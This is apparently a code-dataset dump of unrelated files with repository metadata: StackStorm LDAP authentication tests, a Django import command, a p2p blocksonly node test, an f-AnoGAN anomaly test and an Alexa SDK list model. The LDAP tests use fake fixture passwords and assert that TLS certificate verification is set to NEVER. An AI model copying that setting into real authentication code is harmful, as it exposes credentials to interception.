uri='ldap://testserver.domain.tld')
self.assertEquals(ldapobj.methods_called(),
self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
self.assertTrue(result)
finally:
del ldapobj
@mock.patch('st2auth_ldap_backend.ldap_backend.ldap.set_option')
def test_ldap_connect_ldap_start_tls(self, mock_set_option):
try:
ldapobj = self.mockldap['ldap://testserver.domain.tld']
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest',
uri='ldap://testserver.domain.tld',
use_tls=True)
self.assertEquals(ldapobj.methods_called(),
self.connect_methods + ['start_tls_s',
'simple_bind_s', 'whoami_s', 'unbind'])
mock_set_option.assert_has_calls(
[
mock.call(ldap.OPT_X_TLS, ldap.OPT_X_TLS_DEMAND),
mock.call(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER),
])
self.assertTrue(result)
finally:
del ldapobj
@mock.patch('st2auth_ldap_backend.ldap_backend.ldap.set_option')
def test_ldap_connect_ldaps(self, mock_set_option):
try:
ldapobj = self.mockldap['ldaps://testserver.domain.tld']
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest',
uri='ldaps://testserver.domain.tld')
self.assertEquals(ldapobj.methods_called(),
self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
mock_set_option.assert_has_calls(
[
mock.call(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER),
])
self.assertTrue(result)
finally:
del ldapobj
def _do_simple_bind(bind_dn, bind_pw, uri=DEFAULT_URI, user_search=None, group_search=None, username=None, password=None, ref_hop_limit=0, chase_referrals=True, use_tls=False):
backend = LDAPAuthenticationBackend(uri, use_tls=use_tls, bind_dn=bind_dn, bind_pw=bind_pw, user=user_search, group=group_search, ref_hop_limit=ref_hop_limit, chase_referrals=chase_referrals)
return backend.authenticate(username, password)
if __name__ == '__main__':
sys.exit(unittest2.main())
| 45.81106
| 195
| 0.63228
|
import ldap
import logging
import os
import re
import unittest2
import mock
from mockldap import MockLdap
from mockldap.recording import RecordedMethod
from st2auth_ldap_backend import ldap_backend
from st2auth_ldap_backend.ldap_backend import LDAPAuthenticationBackend
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DEFAULT_URI = 'ldap://fakeldap.example.com/'
class LDAPAuthenticationBackendTestCase(unittest2.TestCase):
connect_methods = ['initialize', 'set_option', 'set_option']
directory = {
'dc=com': {'dc': ['com']},
'dc=example,dc=com': {'dc': ['example']},
'ou=users,dc=example,dc=com': {'ou': ['users'], 'objectClass': ['groupOfNames'], 'member': ['uid=sarah_connor,ou=users,dc=example,dc=com', 'uid=john_connor,ou=users,dc=example,dc=com']},
'cn=manager,dc=example,dc=com': {'cn': ['manager'], 'userPassword': ['ldaptest']},
'uid=sarah_connor,ou=users,dc=example,dc=com': { 'uid': ['sarah_connor'], 'userPassword': ['Reece4ever'], 'objectclass': ['inetOrgPerson', 'posixAccount', 'person', 'top'] },
'uid=john_connor,ou=users,dc=example,dc=com': { 'uid': ['john_connor'], 'userPassword': ['HastaLavista'], 'objectclass': ['inetOrgPerson', 'posixAccount', 'person', 'top'] },
'cn=resistance,ou=groups,dc=example,dc=com': { 'cn': ['resistance'], 'description': ['memberOf'], 'memberuid': ['sarah_connor', 'john_connor'], 'objectclass': ['posixGroup', 'top']}
}
@classmethod
def setUpClass(cls):
cls.mockldap = MockLdap(cls.directory)
@classmethod
def tearDownClass(cls):
del cls.mockldap
def setUp(self):
self.mockldap.start()
self.ldapobj = self.mockldap['ldap://fakeldap.example.com/']
self.mock_referral = []
self.ldapobj._result = self.ldapobj.result
def side_effect_result(*args, **kwargs):
def result(ldapobj, msgid, all):
if all:
return (ldap.RES_SEARCH_RESULT, self._sync_results)
else:
if self._sync_results:
return (ldap.RES_SEARCH_ENTRY, [self._sync_results.pop()])
elif self.mock_referral:
return (ldap.RES_SEARCH_REFERENCE, [self.mock_referral.pop()])
else:
return (ldap.RES_SEARCH_RESULT, None)
if self._sync_results == None:
self._sync_results = self.ldapobj._result(*args, **kwargs)[1]
return result(self.ldapobj, *args, **kwargs)
else:
return RecordedMethod(result, self.ldapobj)(*args, **kwargs)
self.ldapobj.result = mock.Mock(side_effect=side_effect_result)
self.ldapobj._search = self.ldapobj.search
def side_effect_search(*args, **kwargs):
self._sync_results = None
return self.ldapobj._search(*args, **kwargs)
self.ldapobj.search = mock.Mock(side_effect=side_effect_search)
class LogHandler(logging.StreamHandler):
def __init__(self, *args, **kwargs):
self.reset()
logging.StreamHandler.__init__(self, *args, **kwargs)
def emit(self, record):
self.messages[record.levelname.lower()].append(record.getMessage())
def reset(self):
self.messages = {
'debug': [],
'info': [],
'warning': [],
'error': [],
'critical': [],
}
self.log_handler = LogHandler()
ldap_backend.LOG.addHandler(self.log_handler)
def tearDown(self):
self.mockldap.stop()
del self.ldapobj
def test_bind_anonymous(self):
result = _do_simple_bind('', '')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
self.assertTrue(result)
def test_bind_dn_valid(self):
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
self.assertTrue(result)
def test_bind_dn_invalid_user(self):
result = _do_simple_bind('uid=invalid_user,ou=users,dc=example,dc=com', 'none')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'unbind'])
self.assertFalse(result)
def test_bind_dn_invalid_password(self):
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'invalid_password')
self.assertEquals(self.ldapobj.methods_called(), self.connect_methods + ['simple_bind_s', 'unbind'])
self.assertFalse(result)
def test_search_valid_username(self):
username = 'sarah_connor'
password = 'Reece4ever'
user_dn = 'uid={},ou=users,dc=example,dc=com'.format(username)
mock_res = (user_dn, LDAPAuthenticationBackendTestCase.directory[user_dn])
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
self.ldapobj.search_s.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))([mock_res])
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=None, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
def test_search_invalid_username(self):
username = 'invalid_username'
password = 'Reece4ever'
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
mock_res = []
self.ldapobj.search_s.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=None, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertFalse(result)
def test_search_invalid_password(self):
username = 'sarah_connor'
password = 'bad_password'
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
mock_res_id = 1234
mock_res = (ldap.RES_SEARCH_RESULT, None)
self.ldapobj._search.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_res_id)
self.ldapobj._result.seed(mock_res_id, all=0)(mock_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=None, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertFalse(result)
def test_search_valid_username_valid_group(self):
username = 'john_connor'
password = 'HastaLavista'
user_dn = 'uid={},ou=users,dc=example,dc=com'.format(username)
mock_user_res_id = 1234
mock_user_res = (ldap.RES_SEARCH_RESULT, [(user_dn, LDAPAuthenticationBackendTestCase.directory[user_dn])])
groupname = 'resistance'
group_dn = 'cn={groupname},ou=groups,dc=example,dc=com'.format(groupname=groupname)
mock_group_res_id = 9999
mock_group_res = (ldap.RES_SEARCH_RESULT, [(group_dn, LDAPAuthenticationBackendTestCase.directory[group_dn])])
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
group = {"base_dn": "ou=groups,dc=example,dc=com", "search_filter": "(&(cn=%s)(memberUid={username}))"%groupname, "scope": "subtree"}
self.ldapobj._search.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_user_res_id)
self.ldapobj._search.seed(group["base_dn"], ldap.SCOPE_SUBTREE, group["search_filter"].format(username=username))(mock_group_res_id)
self.ldapobj._result.seed(mock_user_res_id, all=0)(mock_user_res)
self.ldapobj._result.seed(mock_group_res_id, all=0)(mock_group_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=group, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'search', 'result', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
def test_search_valid_username_invalid_group(self):
username = 'john_connor'
password = 'HastaLavista'
user_dn = 'uid={},ou=users,dc=example,dc=com'.format(username)
mock_user_res_id = 1234
mock_user_res = (ldap.RES_SEARCH_RESULT, [(user_dn, LDAPAuthenticationBackendTestCase.directory[user_dn])])
groupname = 'invalid_group'
group_dn = 'cn={groupname},ou=groups,dc=example,dc=com'.format(groupname=groupname)
mock_group_res_id = 9999
mock_group_res = (ldap.RES_SEARCH_RESULT, None)
user = {"base_dn": "ou=users,dc=example,dc=com", "search_filter": "(uid={username})", "scope": "onelevel"}
group = {"base_dn": "ou=groups,dc=example,dc=com", "search_filter": "(&(cn=%s)(memberUid={username}))"%groupname, "scope": "subtree"}
self.ldapobj._search.seed(user["base_dn"], ldap.SCOPE_ONELEVEL, user["search_filter"].format(username=username))(mock_user_res_id)
self.ldapobj._search.seed(group["base_dn"], ldap.SCOPE_SUBTREE, group["search_filter"].format(username=username))(mock_group_res_id)
self.ldapobj._result.seed(mock_user_res_id, all=0)(mock_user_res)
self.ldapobj._result.seed(mock_group_res_id, all=0)(mock_group_res)
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest', user_search=user, group_search=group, username=username, password=password)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'search', 'result', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertFalse(result)
def test_search_with_reference_result(self):
self.mock_referral = [
(None, ['ldap://fakeldap2.example.com/ou=cyberdyne,dc=example,dc=com']),
]
user = {
"base_dn": "ou=users,dc=example,dc=com",
"search_filter": "(uid={username})",
"scope": "subtree",
}
result = _do_simple_bind('', '',
user_search=user, group_search=None,
username='john_connor', password='HastaLavista',
ref_hop_limit=1)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
self.assertEqual(len(self.log_handler.messages['warning']), 0)
def test_search_with_reference_result_but_exceeded_maximum_referal_hop(self):
self.mock_referral = [
(None, ['ldap://fakeldap2.example.com/ou=cyberdyne,dc=example,dc=com']),
]
user = {
"base_dn": "ou=users,dc=example,dc=com",
"search_filter": "(uid={username})",
"scope": "subtree",
}
result = _do_simple_bind('', '',
user_search=user, group_search=None,
username='john_connor', password='HastaLavista',
ref_hop_limit=0)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
self.assertTrue(len(self.log_handler.messages['warning']) > 0)
self.assertTrue(re.match(r'^Referral hop limit is exceeded',
self.log_handler.messages['warning'][0]))
@mock.patch('st2auth_ldap_backend.ldap_backend.LDAPAuthenticationBackend._get_ldap_search_referral')
def test_search_with_reference_result_but_chase_referrals_false(self, mock_search_referral):
self.mock_referral = [
(None, ['ldap://fakeldap2.example.com/ou=cyberdyne,dc=example,dc=com']),
]
user = {
"base_dn": "ou=users,dc=example,dc=com",
"search_filter": "(uid={username})",
"scope": "subtree",
}
result = _do_simple_bind('', '',
user_search=user, group_search=None,
username='john_connor', password='HastaLavista',
chase_referrals=False)
expected_methods_called = (
self.connect_methods +
['simple_bind_s', 'whoami_s', 'search', 'result', 'result', 'result'] +
self.connect_methods +
['simple_bind_s', 'whoami_s', 'unbind', 'unbind']
)
self.assertEquals(self.ldapobj.methods_called(), expected_methods_called)
self.assertTrue(result)
self.assertEqual(len(self.log_handler.messages['warning']), 0)
mock_search_referral.assert_not_called()
def test_ldap_connect(self):
try:
ldapobj = self.mockldap['ldap://testserver.domain.tld']
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest',
uri='ldap://testserver.domain.tld')
self.assertEquals(ldapobj.methods_called(),
self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
self.assertTrue(result)
finally:
del ldapobj
@mock.patch('st2auth_ldap_backend.ldap_backend.ldap.set_option')
def test_ldap_connect_ldap_start_tls(self, mock_set_option):
try:
ldapobj = self.mockldap['ldap://testserver.domain.tld']
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest',
uri='ldap://testserver.domain.tld',
use_tls=True)
self.assertEquals(ldapobj.methods_called(),
self.connect_methods + ['start_tls_s',
'simple_bind_s', 'whoami_s', 'unbind'])
mock_set_option.assert_has_calls(
[
mock.call(ldap.OPT_X_TLS, ldap.OPT_X_TLS_DEMAND),
mock.call(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER),
])
self.assertTrue(result)
finally:
del ldapobj
@mock.patch('st2auth_ldap_backend.ldap_backend.ldap.set_option')
def test_ldap_connect_ldaps(self, mock_set_option):
try:
ldapobj = self.mockldap['ldaps://testserver.domain.tld']
result = _do_simple_bind('cn=manager,dc=example,dc=com', 'ldaptest',
uri='ldaps://testserver.domain.tld')
self.assertEquals(ldapobj.methods_called(),
self.connect_methods + ['simple_bind_s', 'whoami_s', 'unbind'])
mock_set_option.assert_has_calls(
[
mock.call(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER),
])
self.assertTrue(result)
finally:
del ldapobj
def _do_simple_bind(bind_dn, bind_pw, uri=DEFAULT_URI, user_search=None, group_search=None, username=None, password=None, ref_hop_limit=0, chase_referrals=True, use_tls=False):
backend = LDAPAuthenticationBackend(uri, use_tls=use_tls, bind_dn=bind_dn, bind_pw=bind_pw, user=user_search, group=group_search, ref_hop_limit=ref_hop_limit, chase_referrals=chase_referrals)
return backend.authenticate(username, password)
if __name__ == '__main__':
sys.exit(unittest2.main())
| true
| true
|
1c493b5eb5539f3e0d4794d929c482d9fe3c4bc4
| 562
|
py
|
Python
|
books/management/commands/xlsx_books_import.py
|
cnlis/lib_books
|
05bed0f9775826e0b1f968a766ddf5c2d1d55f40
|
[
"MIT"
] | null | null | null |
books/management/commands/xlsx_books_import.py
|
cnlis/lib_books
|
05bed0f9775826e0b1f968a766ddf5c2d1d55f40
|
[
"MIT"
] | null | null | null |
books/management/commands/xlsx_books_import.py
|
cnlis/lib_books
|
05bed0f9775826e0b1f968a766ddf5c2d1d55f40
|
[
"MIT"
] | null | null | null |
import os
from django.core.management.base import BaseCommand, CommandError
from books.parsers.books_import import books_saver
from books.parsers.xlsx_import_export import xlsx_read
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('file', type=str)
def handle(self, *args, **options):
file_path = options['file']
# if not os.path.exists(file_path):
# raise CommandError(f'file {file_path} doesn\'t exists')
books = xlsx_read(file_path, 7)
books_saver(books, 'ФПУ')
| 29.578947
| 69
| 0.699288
|
import os
from django.core.management.base import BaseCommand, CommandError
from books.parsers.books_import import books_saver
from books.parsers.xlsx_import_export import xlsx_read
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('file', type=str)
def handle(self, *args, **options):
file_path = options['file']
books = xlsx_read(file_path, 7)
books_saver(books, 'ФПУ')
| true
| true
|
1c493bdf953ce763337d874af9e7af5c511847cd
| 2,443
|
py
|
Python
|
test/functional/p2p_blocksonly.py
|
aentan/ain
|
1d6db33159de1c8c7930d29a0ab0902f42b728c1
|
[
"MIT"
] | null | null | null |
test/functional/p2p_blocksonly.py
|
aentan/ain
|
1d6db33159de1c8c7930d29a0ab0902f42b728c1
|
[
"MIT"
] | null | null | null |
test/functional/p2p_blocksonly.py
|
aentan/ain
|
1d6db33159de1c8c7930d29a0ab0902f42b728c1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test p2p blocksonly"""
from test_framework.messages import msg_tx, CTransaction, FromHex
from test_framework.mininode import P2PInterface
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class P2PBlocksOnly(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
self.extra_args = [["-blocksonly"]]
def run_test(self):
self.nodes[0].add_p2p_connection(P2PInterface())
self.log.info('Check that txs from p2p are rejected')
prevtx = self.nodes[0].getblock(self.nodes[0].getblockhash(1), 2)['tx'][0]
rawtx = self.nodes[0].createrawtransaction(
inputs=[{
'txid': prevtx['txid'],
'vout': 0
}],
outputs=[{
self.nodes[0].get_genesis_keys().operatorAuthAddress: 50 - 0.00125
}],
)
sigtx = self.nodes[0].signrawtransactionwithkey(
hexstring=rawtx,
privkeys=[self.nodes[0].get_genesis_keys().operatorPrivKey],
prevtxs=[{
'txid': prevtx['txid'],
'vout': 0,
'scriptPubKey': prevtx['vout'][0]['scriptPubKey']['hex'],
}],
)['hex']
assert_equal(self.nodes[0].getnetworkinfo()['localrelay'], False)
with self.nodes[0].assert_debug_log(['transaction sent in violation of protocol peer=0']):
self.nodes[0].p2p.send_message(msg_tx(FromHex(CTransaction(), sigtx)))
self.nodes[0].p2p.sync_with_ping()
assert_equal(self.nodes[0].getmempoolinfo()['size'], 0)
self.log.info('Check that txs from rpc are not rejected and relayed to other peers')
assert_equal(self.nodes[0].getpeerinfo()[0]['relaytxes'], True)
txid = self.nodes[0].testmempoolaccept([sigtx])[0]['txid']
with self.nodes[0].assert_debug_log(['received getdata for: tx {} peer=0'.format(txid)]):
self.nodes[0].sendrawtransaction(sigtx)
self.nodes[0].p2p.wait_for_tx(txid)
assert_equal(self.nodes[0].getmempoolinfo()['size'], 1)
if __name__ == '__main__':
P2PBlocksOnly().main()
| 41.40678
| 98
| 0.630782
|
from test_framework.messages import msg_tx, CTransaction, FromHex
from test_framework.mininode import P2PInterface
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class P2PBlocksOnly(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
self.extra_args = [["-blocksonly"]]
def run_test(self):
self.nodes[0].add_p2p_connection(P2PInterface())
self.log.info('Check that txs from p2p are rejected')
prevtx = self.nodes[0].getblock(self.nodes[0].getblockhash(1), 2)['tx'][0]
rawtx = self.nodes[0].createrawtransaction(
inputs=[{
'txid': prevtx['txid'],
'vout': 0
}],
outputs=[{
self.nodes[0].get_genesis_keys().operatorAuthAddress: 50 - 0.00125
}],
)
sigtx = self.nodes[0].signrawtransactionwithkey(
hexstring=rawtx,
privkeys=[self.nodes[0].get_genesis_keys().operatorPrivKey],
prevtxs=[{
'txid': prevtx['txid'],
'vout': 0,
'scriptPubKey': prevtx['vout'][0]['scriptPubKey']['hex'],
}],
)['hex']
assert_equal(self.nodes[0].getnetworkinfo()['localrelay'], False)
with self.nodes[0].assert_debug_log(['transaction sent in violation of protocol peer=0']):
self.nodes[0].p2p.send_message(msg_tx(FromHex(CTransaction(), sigtx)))
self.nodes[0].p2p.sync_with_ping()
assert_equal(self.nodes[0].getmempoolinfo()['size'], 0)
self.log.info('Check that txs from rpc are not rejected and relayed to other peers')
assert_equal(self.nodes[0].getpeerinfo()[0]['relaytxes'], True)
txid = self.nodes[0].testmempoolaccept([sigtx])[0]['txid']
with self.nodes[0].assert_debug_log(['received getdata for: tx {} peer=0'.format(txid)]):
self.nodes[0].sendrawtransaction(sigtx)
self.nodes[0].p2p.wait_for_tx(txid)
assert_equal(self.nodes[0].getmempoolinfo()['size'], 1)
if __name__ == '__main__':
P2PBlocksOnly().main()
| true
| true
|
1c493be0790b14fa3c6b8005e3c441951a283582
| 1,373
|
py
|
Python
|
fanogan/test_anomaly_detection.py
|
A03ki/f-AnoGAN
|
c431034f818c9c9577c0ecac5d9390a9293c4661
|
[
"MIT"
] | 41
|
2020-04-17T06:37:00.000Z
|
2022-03-21T10:58:20.000Z
|
fanogan/test_anomaly_detection.py
|
A03ki/f-AnoGAN
|
c431034f818c9c9577c0ecac5d9390a9293c4661
|
[
"MIT"
] | 3
|
2020-11-25T14:06:59.000Z
|
2022-03-31T13:01:09.000Z
|
20) AnoGAN,f-AnoGAN/f-AnoGAN/fanogan/test_anomaly_detection.py
|
LEE-SEON-WOO/Deep_Learning_Zero_to_Gan
|
fecd9672f8f216e2d9ee618b2a03ed6b6d2fa3ba
|
[
"MIT"
] | 18
|
2020-04-16T09:23:11.000Z
|
2022-03-27T15:45:30.000Z
|
import torch
import torch.nn as nn
from torch.utils.model_zoo import tqdm
def test_anomaly_detection(opt, generator, discriminator, encoder,
dataloader, device, kappa=1.0):
generator.load_state_dict(torch.load("results/generator"))
discriminator.load_state_dict(torch.load("results/discriminator"))
encoder.load_state_dict(torch.load("results/encoder"))
generator.to(device).eval()
discriminator.to(device).eval()
encoder.to(device).eval()
criterion = nn.MSELoss()
with open("results/score.csv", "w") as f:
f.write("label,img_distance,anomaly_score,z_distance\n")
for (img, label) in tqdm(dataloader):
real_img = img.to(device)
real_z = encoder(real_img)
fake_img = generator(real_z)
fake_z = encoder(fake_img)
real_feature = discriminator.forward_features(real_img)
fake_feature = discriminator.forward_features(fake_img)
# Scores for anomaly detection
img_distance = criterion(fake_img, real_img)
loss_feature = criterion(fake_feature, real_feature)
anomaly_score = img_distance + kappa * loss_feature
z_distance = criterion(fake_z, real_z)
with open("results/score.csv", "a") as f:
f.write(f"{label.item()},{img_distance},"
f"{anomaly_score},{z_distance}\n")
| 32.690476
| 70
| 0.668609
|
import torch
import torch.nn as nn
from torch.utils.model_zoo import tqdm
def test_anomaly_detection(opt, generator, discriminator, encoder,
dataloader, device, kappa=1.0):
generator.load_state_dict(torch.load("results/generator"))
discriminator.load_state_dict(torch.load("results/discriminator"))
encoder.load_state_dict(torch.load("results/encoder"))
generator.to(device).eval()
discriminator.to(device).eval()
encoder.to(device).eval()
criterion = nn.MSELoss()
with open("results/score.csv", "w") as f:
f.write("label,img_distance,anomaly_score,z_distance\n")
for (img, label) in tqdm(dataloader):
real_img = img.to(device)
real_z = encoder(real_img)
fake_img = generator(real_z)
fake_z = encoder(fake_img)
real_feature = discriminator.forward_features(real_img)
fake_feature = discriminator.forward_features(fake_img)
img_distance = criterion(fake_img, real_img)
loss_feature = criterion(fake_feature, real_feature)
anomaly_score = img_distance + kappa * loss_feature
z_distance = criterion(fake_z, real_z)
with open("results/score.csv", "a") as f:
f.write(f"{label.item()},{img_distance},"
f"{anomaly_score},{z_distance}\n")
| true
| true
|
1c493c2bf3a81a6fac43b70ac6aa4941ba45540e
| 4,950
|
py
|
Python
|
ask-sdk-model/ask_sdk_model/services/list_management/alexa_list.py
|
Signal-Kinetics/alexa-apis-for-python
|
abb8d3dce18a5510c48b215406ed36c024f01495
|
[
"Apache-2.0"
] | 2
|
2021-10-30T06:52:48.000Z
|
2021-11-16T12:34:16.000Z
|
ask-sdk-model/ask_sdk_model/services/list_management/alexa_list.py
|
Signal-Kinetics/alexa-apis-for-python
|
abb8d3dce18a5510c48b215406ed36c024f01495
|
[
"Apache-2.0"
] | null | null | null |
ask-sdk-model/ask_sdk_model/services/list_management/alexa_list.py
|
Signal-Kinetics/alexa-apis-for-python
|
abb8d3dce18a5510c48b215406ed36c024f01495
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from datetime import datetime
from ask_sdk_model.services.list_management.alexa_list_item import AlexaListItem
from ask_sdk_model.services.list_management.list_state import ListState
from ask_sdk_model.services.list_management.links import Links
class AlexaList(object):
"""
:param list_id:
:type list_id: (optional) str
:param name:
:type name: (optional) str
:param state:
:type state: (optional) ask_sdk_model.services.list_management.list_state.ListState
:param version:
:type version: (optional) int
:param items:
:type items: (optional) list[ask_sdk_model.services.list_management.alexa_list_item.AlexaListItem]
:param links:
:type links: (optional) ask_sdk_model.services.list_management.links.Links
"""
deserialized_types = {
'list_id': 'str',
'name': 'str',
'state': 'ask_sdk_model.services.list_management.list_state.ListState',
'version': 'int',
'items': 'list[ask_sdk_model.services.list_management.alexa_list_item.AlexaListItem]',
'links': 'ask_sdk_model.services.list_management.links.Links'
} # type: Dict
attribute_map = {
'list_id': 'listId',
'name': 'name',
'state': 'state',
'version': 'version',
'items': 'items',
'links': 'links'
} # type: Dict
supports_multiple_types = False
def __init__(self, list_id=None, name=None, state=None, version=None, items=None, links=None):
# type: (Optional[str], Optional[str], Optional[ListState], Optional[int], Optional[List[AlexaListItem]], Optional[Links]) -> None
"""
:param list_id:
:type list_id: (optional) str
:param name:
:type name: (optional) str
:param state:
:type state: (optional) ask_sdk_model.services.list_management.list_state.ListState
:param version:
:type version: (optional) int
:param items:
:type items: (optional) list[ask_sdk_model.services.list_management.alexa_list_item.AlexaListItem]
:param links:
:type links: (optional) ask_sdk_model.services.list_management.links.Links
"""
self.__discriminator_value = None # type: str
self.list_id = list_id
self.name = name
self.state = state
self.version = version
self.items = items
self.links = links
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {} # type: Dict
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, AlexaList):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
| 34.137931
| 138
| 0.609293
|
import pprint
import re import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from datetime import datetime
from ask_sdk_model.services.list_management.alexa_list_item import AlexaListItem
from ask_sdk_model.services.list_management.list_state import ListState
from ask_sdk_model.services.list_management.links import Links
class AlexaList(object):
deserialized_types = {
'list_id': 'str',
'name': 'str',
'state': 'ask_sdk_model.services.list_management.list_state.ListState',
'version': 'int',
'items': 'list[ask_sdk_model.services.list_management.alexa_list_item.AlexaListItem]',
'links': 'ask_sdk_model.services.list_management.links.Links'
}
attribute_map = {
'list_id': 'listId',
'name': 'name',
'state': 'state',
'version': 'version',
'items': 'items',
'links': 'links'
} supports_multiple_types = False
def __init__(self, list_id=None, name=None, state=None, version=None, items=None, links=None):
self.__discriminator_value = None
self.list_id = list_id
self.name = name
self.state = state
self.version = version
self.items = items
self.links = links
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, AlexaList):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true
| true
|
